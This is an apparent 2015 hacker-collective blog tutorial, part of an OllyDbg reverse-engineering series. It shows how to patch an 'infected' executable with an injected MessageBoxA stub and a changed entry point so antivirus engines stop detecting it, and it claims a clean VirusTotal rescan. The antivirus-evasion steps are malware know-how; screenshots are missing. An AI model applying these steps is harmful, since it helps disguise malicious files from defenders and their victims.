By ro0ted | April 6, 2015 - 01:57 | Posted in /b/ | 7 Comments
#ro0ted #OpNewblood What the blackhats dont want you to know: ASM Injecting pt 3 Crypt against AVs

In the last tutorial I showed you how to inject code into ANY program specifically making a msgbox open. This one we will go over how to crypt your .exe using Ollydbg so it’s undetectable to Anti Virus engines. – https://twitter.com/ro0ted/

 

So here’s the infected file:

Untitled

 

Here’s what we know about the file:

Untitled

Now we load it in Ollydbg.
Before we do this make sure it’s a file you compiled.
I’m using something I made for the tutorial; one time use.
Untitled

Like the last tutorial find a codecave and highlight it:

Untitled

So we highlight the part you want to use and right click, modify bytes:

Untitled

Enter a random value, our point is to make a CHAR:

Untitled

 

Untitled

Now right under it click click assemble as we need to create a message box.
This is the format:

PUSH 0                 ; BUTTONS = <OK ONLY>
PUSH 1008751      ; CAPTION  = Our address of the binary we edited.
PUSH 1008751      ; MESSAGE  = Same like above.
PUSH 0                 ; ICON        = <NO ICON>
CALL MessageBoxA; Run MessageBoxA with the Params above.

You may notice this from the last tutorial except the difference here is we are going to change origins on where the code first executes to our CHAR instead of the old one which gets detected:

Untitled

Next line we enter PUSH then the address where your CHAR is located:

Untitled

Next line samething, Next One PUSH 0, Next CALL MessageBoxA:

Untitled

Now click the CALL MessageBoxA one time and right click select new origin. This is replacing the old detected call with our new one.
This will not corrupt the file:

Untitled

Now right click go to Copy> Select ALL:

Untitled

Now right click again go to Copy>to file:

Untitled

Save it how you want:

Untitled

Now we rescan the .exe in Virus total since malwr.com said VT detected it, now ppl say don’t upload it to VT, doesn’t apply to us cuz we can add several CHAR’s to our .exe. this is just one CHAR:

Untitled

 

Completely undetectable.

 Scanned the next day:

9

ro0ted

 


 

 

(In order)

Why am I teaching Reverse Engineering to inexperienced new Anons in OpNewblood?

Whitehat Lab

ASM Programming

Introduction Part 1 Ollydbg 

Introduction Part 2 Using Ollydbg and Tracing Botnets

Analyzing Botnets

 Introduction Part 3 Ollydbg: Cheating a Crackme

Introduction Part 4 Ollydbg: Your first Patch

Encryption 101

Cuckoo Sandbox: Automated Malware Analysis also known as Malwr.com

Introduction to Honeydrive: A Brief Walk Through

Installing Kippo the SSH Honeypot on a VPS Part 1: How to set it up

Resource Hacker

Dll Injection the Easy Way

Visual Basic Binaries Walk Through Part 1

Ollydbg on Steroids

Creating Patchers Part 1

Have you supported the gas mask campaign over the years?

Crack to win a gas mask gift pack

How to edit a register me crack me Pre Part 1

Unwinding Delphi Binaries Walk Through if not Preview

Cracking Delphi Part 2

Reversing Timed Trials: Ollydbg Tricks Part 3

Analyzing Adware

Preview Against Debugging

Bypassing Registering 101

Bypassing Part 2

Android/iOS Reversing

Introducing IDA Pro: Static Analyzing

Hacker’s Disassembler

Ripping Apart Adware

Never trust Warez or Cracked Programs: Reversing a Crypted IRC bot infected file

IDA PRO Book

Unpacking & Crypting there is a difference

Covert Debugging whitepaper from blackhat.com

Manually Unpacking with Ollydbg

Manually Unpacking Part 2

Manually Unpacking 101

ASM Injecting

ASM Injecting Part 2

ASM Injecting Part 3: Crypt your malicious file +

(Visited 1,118 times, 1 visits today)


Trackbacks:

  • You can follow any responses to this entry through the RSS 2.0 feed.
  • Both comments and pings are currently closed.